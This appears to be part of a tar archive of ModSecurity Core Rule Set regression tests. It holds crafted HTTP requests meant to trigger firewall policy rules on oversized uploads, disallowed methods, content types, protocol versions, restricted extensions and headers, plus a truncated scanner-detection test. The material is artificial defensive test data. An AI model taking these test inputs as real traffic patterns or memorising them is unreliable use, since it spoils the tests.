1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 %test Uploaded file size too large (960342) ##################################################### %status 413 %output 960342 %request POST / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://192.168.3.2/form.html Content-Type: multipart/form-data; boundary=---------------------------265001916915724 Content-Length: 10485760 -----------------------------265001916915724 Content-Disposition: form-data; name="file"; filename="test" Content-Type: application/octet-stream Rotem & Ayala -----------------------------265001916915724 Content-Disposition: form-data; name="name" tt2 -----------------------------265001916915724 Content-Disposition: form-data; name="B1" Submit -----------------------------265001916915724-- %endtest �����������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_30_http_policy.tests����������������������������������������������������������������0000664�0000000�0000000�00000006662�12164572564�0035340�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/tests���������������������������������������������������������������������������������������������������%timeout 10 # FILE 30 - HTTP Policy %test Method is not allowed by policy (960032) ##################################################### %output 960032 %var request_method=DELETE %var request_method=FOO %var request_method=SUBSCRIBE %request $request_method / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Request content type is not allowed by policy (960010) ##################################################### %output 960010 %var type=multipart/; %var type=multipart/foo; %var type=application/foo; %request POST / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Content-Type: $type boundary=0000 Content-Length: $CONTENT_LENGTH --0000 Content-Disposition: form-data; name="name" John Smith --0000 Content-Disposition: form-data; name="email" john.smith@example.com --0000 Content-Disposition: form-data; name="image"; filename="image.jpg" Content-Type: image/jpeg BINARYDATA --0000-- %test HTTP protocol version is not allowed by policy (960034) ##################################################### %output 960034 %var http=HTTP/3.0 %var http=HTTP/0.8 %var http=JUNK/1.0 %request GET / $http Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test URL file extension is restricted by policy (960035) ##################################################### %output 960035 %var ext=.bak %var ext=.db %var ext=.old %request GET /foo$ext HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test HTTP header is restricted by policy (960038) ##################################################### %output 960038 %var restricted_header=Proxy-Connection: keep-alive %var restricted_header=Translate: f %var restricted_header=Lock-Token: <opaquelocktoken:a515cfa4-5da4-22e1-f5bf-00a0451e6bf7> %request GET / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 $restricted_header Keep-Alive: 300 Proxy-Connection: keep-alive %endtest ������������������������������������������������������������������������������modsecurity_crs_35_bad_robots.tests�����������������������������������������������������������������0000664�0000000�0000000�00000004451�12164572564�0035117�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/tests���������������������������������������������������������������������������������������������������%timeout 10 # FILE 35 - HTTP Bad Robots %test Request Indicates a Security Scanner Scanned the Site (990002) ##################################################### %output 990002 %var ua=Mozilla/4.0 (compatible; MSIE 7.0; 